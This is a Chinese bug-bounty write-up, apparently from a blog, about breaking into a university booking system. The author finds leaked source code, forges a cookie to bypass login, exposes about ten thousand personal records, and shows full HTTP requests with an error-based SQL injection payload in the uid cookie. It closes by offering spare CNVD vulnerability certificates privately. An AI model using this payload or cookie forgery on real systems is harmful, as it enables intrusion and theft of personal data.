EDUSRC证书站之源码泄露导致的10rank漏洞-夜雨聆风

EDUSRC证书站之源码泄露导致的10rank漏洞

前言:以及停更几个月了，于是有点手痒就写下这篇文章，此次站点是从微信端抓取的链接，用浏览器访问的后台链接，从而得到的一系列漏洞

0x1代码审计突破登录口

首先面对的是一个登录框这里放不了因为现在系统以及下架了找不到登录框了（就放张表情包意思一下）

弱口令尝试无果后扫描一下后台路径发现泄露了网站源码，都有源码了，这还说啥呢，直接开审

审到此处发现可以构造cookie绕过密码验证登入后台并且发现此次cookie存在cookie注入

0x2敏感信息泄露

这个系统是某大学的预约系统故会有大量敏感信息泄露这里泄露了近一万信息

0x3多处sql注入

总而言之有着源码，这个老网站对于我来说，也可称之为千疮百孔了

cookie注入还是挺少见的所以这里就稍微展示一下

观察下面的cookie uid=1

POST /admin/xxxx.php?act=save HTTP/1.1Host:Content-Length: 69Cache-Control: max-age=0Origin: Content-Type: application/x-www-form-urlencodedUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Referer: Accept-Encoding: gzip, deflate, brAccept-Language: zh-CN,zh;q=0.9Cookie: mvcode=c5hg; uName=admin; uid=1; PHPSESSID=lhr5oe0lohqrdrfi3pgocn3jr1Connection: keep-alive

其实看到这处敏感点的师傅都会忍不住的取给它插个单引号吧

POST /admin/xxxx.php?act=save HTTP/1.1Host:Content-Length: 69Cache-Control: max-age=0Origin: Content-Type: application/x-www-form-urlencodedUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Referer: Accept-Encoding: gzip, deflate, brAccept-Language: zh-CN,zh;q=0.9Cookie: mvcode=c5hg; uName=admin; uid=1+and+extractvalue(1,concat(0x7e,database(),0x7e))--+; PHPSESSID=lhr5oe0lohqrdrfi3pgocn3jr1Connection: keep-alive

得以爆出数据库名称‘ticxxet’

其他的sql注入就不过多讲述了师傅们就算没源码进了后台那也是手到擒来的

因为封顶就10rank 所以只拿了十rank 那会没想着分开交也是错失一笔rank

最后再提一嘴小生我最近搞了不少cnvd证书，手上还剩几本多余的，有需要的私我